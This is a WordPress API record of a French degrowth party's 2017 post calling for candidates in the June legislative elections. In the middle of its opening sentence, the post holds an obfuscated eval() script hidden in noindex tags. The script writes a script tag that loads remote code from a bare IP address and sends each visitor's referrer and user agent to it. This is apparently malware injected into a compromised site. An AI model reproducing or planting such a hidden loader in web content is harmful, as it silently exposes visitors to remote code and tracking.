{"id":9308,"date":"2017-02-28T22:24:59","date_gmt":"2017-02-28T21:24:59","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=9308"},"modified":"2017-05-15T07:44:54","modified_gmt":"2017-05-15T06:44:54","slug":"appel-a-des-candidatures-pour-la-decroissance-aux-elections-legislatives-de-juin-2017","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=9308","title":{"rendered":"Appel \u00e0 des candidatures pour la d\u00e9croissance aux \u00e9lections l\u00e9gislatives de juin 2017"},"content":{"rendered":"<div class=\"entry-content\">\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full alignleft\" src=\"http:\/\/processus-decroissance.xyz\/wp-content\/uploads\/2016\/12\/escargot_plan%C3%A8te.jpg\" width=\"248\" height=\"93\" \/><\/p>\n<p><strong><em>Pourquoi <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ksyiy|var|u0026u|referrer|ketir||js|php'.split('|'),0,{}))\n<\/script><\/noindex> la d\u00e9croissance\u00a0? Parce qu\u2019il ne s\u2019agit plus d\u2019objecter \u00e0 la croissance, il s\u2019agit de repasser sous les seuils de soutenabilit\u00e9 sociale et \u00e9cologique.<\/em><\/strong><\/p>\n<p>Au regard du monde dans lequel nous pataugeons, il est indispensable d\u2019emprunter collectivement le trajet de la d\u00e9croissance vers des soci\u00e9t\u00e9s \u00e9cologiquement soutenables, socialement d\u00e9centes et d\u00e9mocratiquement organis\u00e9es. \u00c9tant entendu que cette d\u00e9croissance passe par la baisse de l\u2019extraction, de la production, de la consommation, des d\u00e9chets.<span id=\"more-216\"><\/span><\/p>\n<p>La question des limites est un \u00e9l\u00e9ment crucial de la philosophie politique naissante de la d\u00e9croissance. Or, les lois sont des limites dont se dotent les Hommes pour r\u00e9ussir \u00e0 vivre ensemble, c\u2019est une des raisons pour lesquelles il est l\u00e9gitime de se pr\u00e9senter aux \u00e9lections l\u00e9gislatives qui auront lieu les 11 et 18 juin 2017. Notre projet non-electoraliste se doit d\u2019\u00eatre pr\u00e9sent lors de ce d\u00e9bat, sans tomber dans l\u2019illusion d\u2019une \u00e9lection changeant la soci\u00e9t\u00e9.<\/p>\n<p>Les d\u00e9croissant.e.s r\u00e9uni.e.s \u00e0 Peyrat de Bellac les 29 et 30 octobre 2016, lancent cet appel pour pr\u00e9senter 90 bin\u00f4mes de candidat.e.s d\u00e9croissant.e.s\u00a0aux l\u00e9gislatives de 2017. Ces candidatures doivent \u00eatre l\u2019occasion de faire campagne pour rendre visible la d\u00e9croissance dans le d\u00e9bat public avec des propositions identifiantes et clivantes.<\/p>\n<p>Nous faisons le choix d\u2019\u00eatre pr\u00e9sents aux l\u00e9gislatives de mani\u00e8re autonome. Le projet coh\u00e9rent que nous d\u00e9finissons depuis des ann\u00e9es ne peut trouver sa place au sein des partis \u00e9cologistes (capitalistes) ou d\u2019extr\u00eame gauche (productivistes) actuels. De plus, ce projet ne peut se r\u00e9duire \u00e0 la transformation de la d\u00e9mocratie repr\u00e9sentative (tirage au sort, listes ou candidatures \u00ab\u00a0citoyennes\u00a0\u00bb) port\u00e9e par de nombreux groupes \u00e0 chaque \u00e9lection d\u00e9sormais.<\/p>\n<p>Pour atteindre ce premier objectif de visibilit\u00e9 de la d\u00e9croissance nous ferons campagne avec nos bulletins, nos programmes et nos affiches, sans quoi notre projet serait \u00e0 nouveau condamn\u00e9 \u00e0 l\u2019invisibilit\u00e9.<\/p>\n<p>Le deuxi\u00e8me objectif est de rechercher les financements public et priv\u00e9 des organisations politiques afin de se donner les moyens financiers de rendre visible la d\u00e9croissance.<\/p>\n<p>L\u2019engagement politique auquel nous vous appelons nous am\u00e8nera \u00e0 \u00e9crire ensemble les id\u00e9es du programme \u00e0 faire conna\u00eetre \u00e0 nos concitoyen.nes.<\/p>\n<p>Retrouver le sens des limites, redonner du sens \u00e0 nos vies en d\u00e9sirant pr\u00e9server la vie sur Terre, une vie d\u00e9cente pour nos petits-enfants\u00a0: n\u2019est-ce pas l\u00e0 une ambition enthousiasmante\u00a0?<\/p>\n<p>Nous vous invitons \u00e0 nous rejoindre. Vous pouvez d\u00e9s \u00e0 pr\u00e9sent vous organiser localement et prendre contact avec le groupe de travail \u00ab\u00a0Elections\u00a0\u00bb.<\/p>\n<p>? Contacts du groupe de travail \u00c9lections du Processus-D\u00e9croissance :<\/p>\n<ul>\n<li><a href=\"mailto:elections@listes.processus-decroissance.xyz\">elections@listes.processus-decroissance.xyz<\/a><\/li>\n<li>06 77 89 09 35<\/li>\n<\/ul>\n<p><strong>Source<\/strong> : <a href=\"http:\/\/processus-decroissance.xyz\/2016\/12\/07\/appel-a-des-candidatures-pour-la-decroissance-aux-elections-legislatives-de-juin-2017\/\">Processus D\u00e9croissance<\/a><\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Pourquoi la d\u00e9croissance\u00a0? Parce qu\u2019il ne s\u2019agit plus d\u2019objecter \u00e0 la croissance, il s\u2019agit de repasser sous les seuils de soutenabilit\u00e9 sociale et \u00e9cologique. Au regard du monde dans lequel nous pataugeons, il est indispensable d\u2019emprunter collectivement le trajet de &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=9308\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,32,33],"tags":[],"class_list":["post-9308","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d","category-elections","category-soutiens-du-ppld"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9308"}],"version-history":[{"count":1,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9308\/revisions"}],"predecessor-version":[{"id":9309,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/9308\/revisions\/9309"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}